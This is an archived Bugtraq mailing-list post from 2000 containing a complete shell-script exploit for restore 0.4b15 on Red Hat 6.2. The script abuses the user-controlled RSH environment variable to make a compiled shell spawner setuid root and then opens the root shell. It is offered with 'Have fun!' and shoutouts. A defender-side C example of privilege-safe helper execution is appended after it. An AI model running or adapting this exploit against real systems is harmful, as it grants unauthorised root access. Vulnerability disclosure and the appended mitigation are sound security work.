5678198 2000-11-04 03:34 -0500 /92 lines/ fish stiqz <fish@ANALOG.ORG>
Imported: 2000-11-04 18:53 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: fish@ANALOG.ORG
Recipient: Bugtraq (import) <13583>
Subject: Redhat 6.2 restore exploit
------------------------------------------------------------
From: fish stiqz <fish@ANALOG.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.GSO.4.21.0011040330390.12231-100000@analog.org>

Well, restore has the same problem as dump. I had hoped that these types of
bugs had all been phased out by now.

-- begin --
#!/bin/sh
#
# Exploits a stupid bug in redhat 6.2's (others..) restore program.
# restore version 0.4b15 executes a program which is found in
# a user modifiable environment variable (RSH).
#
# Have fun!
# - fish
#
# Shoutouts: trey, burke, dono, sinator, jadrax, minuway, lews, hubbs,
# ralph, jen, madspin, hampton, ego, als, scorch.
#
# Cause we da pimpz of #code! (not ef/dal.. etc)
# (irc > irl ? werd : lame)
#
# WERD to the async, isolated, expedience, mindsong, and analog crews
#
#
# #TelcoNinjas can eat it cause they suck hardc0re
# #TelcoNinjas == #smurfkiddies
#

echo "[spl0it]: Starting."

# Write the small C program that restore's helper will later make setuid root.
echo -n "[spl0it]: creating shell spawn... "
echo "#include <stdio.h>" > cool.c
echo "#include <unistd.h>" >> cool.c
echo "int main(void) { " >> cool.c
echo "    setuid(0);" >> cool.c
echo "    setgid(0);" >> cool.c
echo "    execl(\"/bin/sh\", \"-bash\", NULL);" >> cool.c
echo "    return 0;" >> cool.c
echo "}" >> cool.c
echo -e "\t\t\tdone"

echo -n "[sploit]: Compiling shell spawn... "
gcc -o cool cool.c
echo -e "\t\t\tdone"

# The "rsh" that restore ends up running: it only changes ownership and mode of cool.
echo -n "[sploit]: Creating fake rsh program... "
cat > execute_me << EOF
#!/bin/sh
chown root: cool
chmod 4777 cool
EOF
chmod +x execute_me
echo -e "\t\t\tdone"

# now executing the dump command
echo "[spl0it]: Beginning exploitation: "
export TAPE=garbage:garbage
export RSH=./execute_me
/sbin/restore -i

# Exec'n the r00t sh3ll!
echo -n "[spl0it]: Waiting 4 seconds for suid shell... "
sleep 4
echo -e "\t\tdone"

if [ ! -u ./cool ]; then
    echo "[spl0it]: Hmm it didn't work.. Better luck next time eh"
    echo "[spl0it]: Check ./cool anyway =)"
    exit 0
fi

echo "[spl0it]: It Worked! suid shell is now ./cool"
echo "[spl0it]: Entering suid shell..."
./cool
exit 0
-- end --

--
fish stiqz <fish@analog.org>
(5678198) ------------------------------------------
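The defect the post describes is a setuid-root program honouring a user-controlled environment variable (RSH) as the path of a helper it will execute. As an added, defender-side example that is not part of fish's post nor of the real restore source, the following C shows the pattern a setuid program should use instead: ignore the variable when running with elevated privileges, accept only absolute paths, and permanently drop privileges before any exec. DEFAULT_RSH, the function names and the minimal environment are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_RSH "/usr/bin/rsh"   /* compiled-in default; assumed path */

/* Decide which remote-shell program may be run. The environment value is
 * honoured only when the process is NOT privileged (real uid == effective
 * uid) and it names an absolute path; otherwise the compiled-in default
 * wins. A relative value such as "./execute_me" is therefore never used. */
const char *pick_rsh(const char *env_rsh, uid_t ruid, uid_t euid)
{
    if (ruid != euid)                      /* running setuid: never trust env */
        return DEFAULT_RSH;
    if (env_rsh == NULL || env_rsh[0] != '/')
        return DEFAULT_RSH;                /* empty or relative path rejected */
    return env_rsh;
}

/* Give up root permanently before handing control to an external program,
 * and verify that the drop cannot be undone. Returns 0 on success. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0) return -1;
    if (setuid(getuid()) != 0) return -1;
    if (getuid() == 0) return 0;           /* genuinely root: nothing to drop */
    if (setuid(0) == 0) return -1;         /* could regain root: fail closed */
    return 0;
}

/* Spawn the remote shell as the invoking user with a minimal environment.
 * Only returns on failure. */
int run_rsh(const char *host, const char *cmd)
{
    const char *rsh = pick_rsh(getenv("RSH"), getuid(), geteuid());
    if (drop_privileges() != 0) return -1;
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    execle(rsh, rsh, host, cmd, (char *)NULL, envp);
    perror("execle");
    return -1;
}

int main(void)
{
    printf("would run: %s\n", pick_rsh(getenv("RSH"), getuid(), geteuid()));
    return 0;
}
```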